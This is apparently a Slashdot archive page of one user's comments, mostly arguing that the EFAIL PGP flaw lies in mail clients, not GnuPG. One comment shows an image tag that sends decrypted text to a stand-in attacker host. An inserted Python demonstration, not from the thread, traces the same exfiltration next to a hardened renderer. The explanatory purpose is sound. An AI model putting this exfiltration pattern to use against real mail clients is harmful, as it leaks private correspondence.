Slashdot Mirror


User: gweihir

gweihir's activity in the archive.

Stories
0
Comments
19,136

Comments · 19,136

  1. Re:PEBCAK on Ask Slashdot: Which Is the Safest Router? · Score: 1

    People continue to look for easy answers, even after it has been made amply clear to them that these do not cut it. The human condition at work...

  2. Re:Good on US Births Dip To 30-Year Low (npr.org) · Score: 1

    Very obviously so. There are a lot of irrational nay-sayers on this very idea though. These are the people that want to stick to the human race expanding against all evidence that it is not a good idea, until it starts to rot away like a bacterial colony that has grown too far. There are those that say this has already started...

  3. Re:Want us to have kids on US Births Dip To 30-Year Low (npr.org) · Score: 4, Insightful

    It is not about money. At some time, a society just reaches a state where it does not expand anymore and instead shrinks down slowly to a sane size. Most of the west is already there or getting there fast. It is not really a problem, you just need to manage this instead of ignoring it and sticking to the old recipes. Of course, the leadership of some countries is less well equipped to do that...

  4. Re:Feminism at work on US Births Dip To 30-Year Low (npr.org) · Score: 3, Insightful

    You can, and a lot of people try. It is just hugely unethical and has spawned the most evil movements the human race has ever seen. (Organized Religion, Fascism, etc.)

  5. Re:Feminism at work on US Births Dip To 30-Year Low (npr.org) · Score: 4, Insightful

    Naa, that would be rational, fact-based and forward-thinking. Cannot have that, must make America Great Again!

  6. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · Score: 1

    No problem in that case. This exploit depends on wrongly embedding the encrypted part of the email into html after decryption and then doing an external fetch of an image using it. Basically (simplified a lot), if your mailer transforms <img src="http://evil.com/[encrypted]"> to <img src="http://evil.com/my_secret_message">, then "my_secret_message" gets sent to evil.com as part of the query. The attacker would before that inject the http part into the non-encrypted part of the message.

    For this to work, you need a whole lot of pretty extreme stupidity:
    - mixed encrypted+non-encrypted messages
    - broken mime decoding that just concatenates things together
    - broken decryption use that does not treat results from decryption specially
    - broken email display that fetches external links like images.
    - no whole-message integrity protection in (partially) encrypted messages, or ignoring error reports from that integrity protection

    These are all faults on the side of the mailer, probably due to large enthusiasm, small skills, a mistaken belief that "new is better" and absolutely no understanding of software security.

  7. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · Score: 2

    Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out.

    That would actually not be a problem. In Public-Key Crypto, the attacker can always do that, because anybody can encrypt messages for a recipient.
    The problem is a combination of broken MIME decoding in combination with ignoring an error message from PGP/GnuPG and a really stupid decision to load external content when an email is displayed.
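    The direct-exfiltration pattern that comments 6 and 7 describe, as an added example that is not from the original thread and not code from any real mailer or from GnuPG: a toy "mailer" that concatenates the cleartext and decrypted MIME parts into one HTML document and loads remote images, beside one that keeps every part separate, shows decrypted output as escaped text, and honours the integrity verdict. The MIME parts, the `toy_decrypt` stand-in (base64, not cryptography), the `Part` class and the host `evil.example` are all constructed for the illustration.

```python
from __future__ import annotations

import base64
import html
import re
from dataclasses import dataclass


# Constructed stand-in for a multipart email. Real PGP/MIME is more involved;
# this models only the part-concatenation mistake the comment describes.
@dataclass
class Part:
    body: str
    encrypted: bool = False
    integrity_ok: bool = True  # stand-in for the integrity verdict GnuPG reports


def toy_decrypt(part: Part) -> tuple[str, bool]:
    """Stand-in for invoking GnuPG: base64 'ciphertext' in, plaintext and the
    integrity verdict out. Not real cryptography, just enough to trace the data flow."""
    return base64.b64decode(part.body).decode(), part.integrity_ok


IMG_SRC = re.compile(r'<img\s+[^>]*src="([^"]*)"', re.IGNORECASE)


def external_urls(doc: str) -> list[str]:
    """URLs an image-loading renderer would request for this piece of HTML."""
    return [u for u in IMG_SRC.findall(doc) if u.startswith(("http://", "https://"))]


def render_vulnerable(parts: list[Part]) -> list[str]:
    """Broken mailer: decrypts automatically, ignores the integrity verdict,
    concatenates every part into one HTML document and loads remote images.
    Returns the URLs it would fetch (the decrypted secret ends up inside one)."""
    doc = "".join(toy_decrypt(p)[0] if p.encrypted else p.body for p in parts)
    return external_urls(doc)


def render_hardened(parts: list[Part]) -> list[str]:
    """Same input, handled per the checklist in the comment: each MIME part is
    rendered on its own and never merged with its neighbours, decrypted output
    is shown as escaped text, and a failed integrity check suppresses the part.
    Returns the URLs an image loader would see even if one were switched on."""
    urls: list[str] = []
    for p in parts:
        if p.encrypted:
            text, ok = toy_decrypt(p)
            rendered = (f"<pre>{html.escape(text)}</pre>" if ok
                        else "<pre>[integrity check failed; part not shown]</pre>")
        else:
            rendered = p.body
        # Scanned per part: an attacker's unclosed <img src=" in one part can
        # never be completed by text from another part.
        urls.extend(external_urls(rendered))
    return urls


def attacker_message(secret_plaintext: str, tampered: bool = False) -> list[Part]:
    """Constructed message: the attacker's cleartext HTML wraps the victim's
    (re-sent) encrypted part. 'tampered' marks a ciphertext that failed the
    integrity check, which the broken mailer ignores."""
    return [
        Part('<img src="http://evil.example/'),                   # cleartext, attacker-supplied
        Part(base64.b64encode(secret_plaintext.encode()).decode(),
             encrypted=True, integrity_ok=not tampered),          # victim's encrypted part
        Part('">'),                                               # cleartext, attacker-supplied
    ]


if __name__ == "__main__":
    msg = attacker_message("my_secret_message")
    print("vulnerable mailer fetches:", render_vulnerable(msg))
    print("hardened mailer fetches:  ", render_hardened(msg))
```

Running it shows the vulnerable renderer requesting `http://evil.example/my_secret_message`, while the hardened one requests nothing, with or without a failed integrity check, because the decrypted text never shares a document with attacker-controlled HTML.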

  8. Read the description of the problem again.

  9. Re:I don't get the issue with PGP? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · Score: 5, Informative

    It is not a flaw in PGP/GnuPG. It is a flaw in the email software, or rather several flaws in combination. The combination seems to be widespread unfortunately.

  10. Re:A silver lining? on Encrypted Email Has a Major, Divisive Flaw (wired.com) · Score: 3, Insightful

    No need. The morons making "modern" mailers just need to learn about the basics of security.

  11. Re: I don't blame them on Google Employees Resign in Protest Against Pentagon Contract (gizmodo.com) · Score: 1

    Virtue signalling does not involve accepting any real significant personal loss as part of the process. That one is called "personal integrity". But I guess you have no experience with that and hence cannot understand it.

  12. "Don't be evil" was just misdirection on Google Employees Resign in Protest Against Pentagon Contract (gizmodo.com) · Score: 2

    Used to keep people friendly until they were large enough to show their true colors. Corporations lie and they lie about important stuff. So this is not really a surprise at all.

  13. PGP/GnuPG also does no MIME parsing, which must be broken as well to allow the attack. This is 100% incompetent implementation of email software by people that are clueless about security.

    I also have to say I find all the alarmists here a disgrace. Clueless, arrogant and panicky, a very bad combination.

  14. This is 100% the fault of the email client implementations. FWIW, if you still use mutt or pine or alpine etc, you're safe for now.

    Oh, yes. Mutt user here (at least for encrypted email), because I have never trusted these messed up insecure jokes that pass for email software these days. Automatically loading stuff from external places in this way is an instant security fail. Nobody with a clue is surprised this can be exploited.

  15. Nothing is "guaranteed to be secure". Incidentally, it is not PGP or GnuPG that is at fault here. It is fundamentally broken and insecure HTML and MIME parsing in the email software affected. PGP/GnuPG is perfectly fine.

  16. This should come as no surprise at all. Automatic decryption of emails is insecure, pretty much by definition. Anybody using that does not have security as it takes one tiny flaw somewhere else to exploit that. Also, automatically loading external stuff in an email reader is pretty much insane.

  17. Re:Action required: Disable HTML on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    I agree, the behavior of these security "researchers" is really unethical and unacceptable. My initial reaction was that with an announcement this bombastic, it will likely turn out to not be an elephant but a mouse. And look, it is. And people with a secure set-up are not even affected, only people that use fundamentally insecure software in the first place.

  18. Re:Or any other encryption on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    Indeed. The recipient can just publish the email or send it to a 3rd party. You need to be able to trust people you send secrets to.

  19. Re:Or any other encryption on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    On a related note, this is _email_! Automatically loading anything externally is just as insane as automatically opening attachments. Have the people writing this broken email software learned absolutely nothing from the past?

  20. Re:Final straw. Computers are NOT secure. I'm done on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    PGP is very much _not_ broken. Some wannabe mail software is badly broken in how it handles HTML, MIME and PGP integration. This is also not a surprise at all. There is a reason many of us still use mutt or elm or the like at least for encrypted email.

  21. Re:Some advice is worth what you paid for it on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    Indeed. This whole problem comes from crappy clueless implementations and crappy clueless defaults. Turning off PGP completely is entirely the wrong reaction.

  22. Re:Bad HTML Mail Clients on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    And _that_ is a sane default. Do insecure things, be insecure. There is not even a story here except that apparently many makers of email software are really clueless about security.

  23. Re:Bad HTML Mail Clients on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    I am a security expert and I would upgrade that to "extremely dumb" as in "completely clueless about security". And no, you are not wrong. Also, having a correct MIME parser or taking the warning about missing integrity protection seriously also works to solve this. This is a problem on the side of the mail software affected.

    Caveat: I have not looked at the finer details. I use mutt as mailer for anything encrypted, with lynx as html-to-text filter, and am decidedly not affected by any of this.

  24. Re:My understanding is this applies to HTML email on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    The thing is that apparently most email software these days is badly broken and will not only gladly load external includes in HTML email, but also mess up the MIME parsing and ignore warnings about missing integrity protection. I feel pretty smug now that I am on mutt (and will remain on it as primary MUA), even though I had to add lynx as an HTML-to-text filter because some people feel it is acceptable to send HTML-only email. If this were just private email, I would have happily ignored these, but unfortunately it is business.

  25. Re:Werner Koch's Response on Attention PGP Users: New Vulnerabilities Require You To Take Action Now (eff.org) · Score: 1

    And that is just it. This thing is way blown out of proportion and it is attributing blame to the wrong tool (and people).